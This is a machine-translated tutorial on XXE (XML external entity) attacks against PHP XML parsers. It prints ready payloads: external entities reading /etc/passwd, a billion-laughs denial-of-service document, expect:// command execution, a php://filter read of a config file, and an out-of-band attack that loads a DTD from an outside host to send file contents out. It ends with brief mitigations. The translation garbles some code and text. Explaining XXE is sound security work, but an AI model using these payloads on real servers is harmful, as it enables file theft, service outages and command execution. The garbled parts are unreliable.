PHP Entites:
Pre-defined:&<& #37;
General entity: <! ENTITY General "Hello", call mode: in <a>&general;</a>, cannot be included in the attribute.
Parametric entity: <! ENTITY% param "world";, call method, immediate use:%param;
Both the general entity and the parameter entity can contain internal resources (DTDs) and external resources
Harm:
(1) Local file read
<?xml version= "1.0" encoding= "Utf-8"?>
<! DOCTYPE Xdsec [<! ENTITY XXe SYSTEM "FILE:///ETC/PASSWD" >]>
<methodname>&xxe;</methodname>
(2) Dos attacks (Access/dev/zero), nested interpretation entities
<?xml version= "1.0"?>
<! DOCTYPE Lolz [
<! ENTITY lol "LOL" >
<! ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;" >
<! ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2 ;" >
<! ENTITY Lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3 ;" >
<! ENTITY Lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4 ;" >
<! ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5 ;" >
<! ENTITY Lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6 ;" >
<! ENTITY Lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7 ;" >
<! ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8 ;" >
]>
<lolz>&lol9;</lolz>
(3) Resources in LAN
(4) port scan (http://192.168.1.3:22)
(5) Take advantage of some protocol takeaway resources (Php:http,java:gopher (low version), FTP (high version))
(6) Execute the command, if PHP supports the expect extension, it can execute the system command, eg:<! ENTITY a SYSTEM ' expect://uname ' >
General use of ideas:
1, normal output
2, using error information, such as parsing XML errors, Dtd,schema check
Xml:web.xml,tomcat-users.xml,jetty.xml,httpd.conf of interest in the 3,web system
Takeaway: Php://filter/convert.base64-encode/resource=web.xml
Allow_url_fopen = On
4,blind techniques, XSD values bruteforce
Analytic algorithm for parameter entities:
To load an external entity, eg:
<?xml version= "1.0" encoding= "Uq-8"?>
<! DOCTYPE HTML [<! ENTITY % Internal SYSTEM "Local_file.xml" >
%internal;] >
Local_file.xml:
<! ENTITY title "Hello, world!" >
The parsed effect is:
%internal; To replace with <! ENTITY title "Hello, world!" >
Out-of-band attack:
test.php
<?php
Libxml_use_internal_errors (TRUE);
Libxml_disable_entity_loader ();
$xml 1=<<<eof
<?xml version= "1.0" encoding= "UTF-8" standalone= "no"?>
<! DOCTYPE any [
<! ENTITY XXe SYSTEM "FILE:///ETC/PASSWD" >
]>
<x>&xxe; </x>
EOF;
$dom 1 = new DOMDocument ();
$dom 1->loadxml ($xml 1);
Print_r ($dom 1);
$fields = $dom 1->getelementsbytagname (' x ');
foreach ($fields as $field)
{
Print_r ($field->nodename);
Print_r ($field->textcontent);
}
Print_r ($dom 1->savexml ());
$xx = simplexml_load_string ($xml 1);
Print_r ($XX);
Print_r (Libxml_get_errors ());
Libxml_clear_errors ();
Print_r ("Enderror");
?>
Allow_url_fopen=0 the SYSTEM "http://127.0.0.1:22" is not allowed in entity, FTP is the same
The normal entity can only be in the content box, not allowed to appear in the attribute, such as <a>&xxe;</a>
In the experimental process encountered through Print_r ($dom->savexml ()) did not parse the content, through strace tracking, found that access to/etc/passwd, but there is no output, only the output of the content before the unresolved &xxe; have been visited, why not output it? It is possible that the output function does not work, in another way to access the content, it is normal output.
Php-i get compiled information, including supported modules, such as finding the Libxml in the DOM:
Dom
Dom/xml = Enabled
Dom/xml API Version = 20031129
Libxml Version = 2.7.8
HTML support = = enabled
XPath support = = enabled
XPointer support = Enabled
Schema support = Enabled
Relaxng support = Enabled
Libxml
LibXML support = + Active
LibXML Compiled Version = 2.7.8
LibXML Loaded Version = 20708
LibXML streams = Enabled
SimpleXML
Simplexml support = Enabled
Revision = $Revision: 314376 $
Schema support = Enabled
Xml
XML support = = Active
XML Namespace support = = Active
LIBXML2 Version = 2.7.8
Which is made up of XML, SVG format, docs format, xml,xlsx
There is a problem with the following function: Domdocument.loadxml (), Simple_xml_loadfile and XmlReader function, load ()
Transfer tips:
<?xml version= "1.0"? ><! DOCTYPE results [
<! ENTITY harmless SYSTEM "Php://filter/read=convert.base64-encode/resource=/var/www/config.ini" >]><results > <result>&harmless;</result></results>
How to introduce external entities:
test.php
650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M02/6B/FB/wKioL1U8xEuCoW2CAADeS8-2V5A708.jpg "title=" Test_ Php.png "alt=" Wkiol1u8xeucow2caades8-2v5a708.jpg "/>
EVIL.DTD:
650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M02/6B/FF/wKiom1U8wvnRKvWiAAB3nzE9Omc234.jpg "title=" Evil_ Php.png "alt=" Wkiom1u8wvnrkvwiaab3nze9omc234.jpg "/>
Results:
650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M00/6B/FB/wKioL1U8xHPSBLEJAAFnQcIB2GM494.jpg "title=" Result.png "alt=" Wkiol1u8xhpsblejaafnqcib2gm494.jpg "/>
(2) in the properties, only PHP can
test1.php
$xml 1=<<<eof
<?xml version= "1.0" encoding= "UTF-8" standalone= "no"?>
<! DOCTYPE Root [
<! ENTITY% remote SYSTEM "HTTP://10.65.60.111/EVIL.DTD2" >
%remote;
%param1;
<root attrib= "&internal;" />
EOF;
EVIL.DTD2:
<! ENTITY% Payload SYSTEM "FILE:///ETC/PASSWD" >
<! ENTITY% param1 "<! ENTITY internal '%payload; ' > ">
Unsuccessful, general report internal error
Solution:
1, upgrade the LIBXML2 library version to more than 2.9, from more than 2.9 does not default to execute external entities.
2, perform Libxml_disable_entity_loader (true) before using import, disable entity
3, if it is resolved using XmlReader or Dom method,
$doc = Xmlreader::xml ($badXml, ' UTF-8 ', libxml_nonet); With the DOM functionality:
$dom = new DOMDocument (); $dom->loadxml ($badXml, libxml_dtdload| LIBXML_DTDATTR)
PHP XXe attack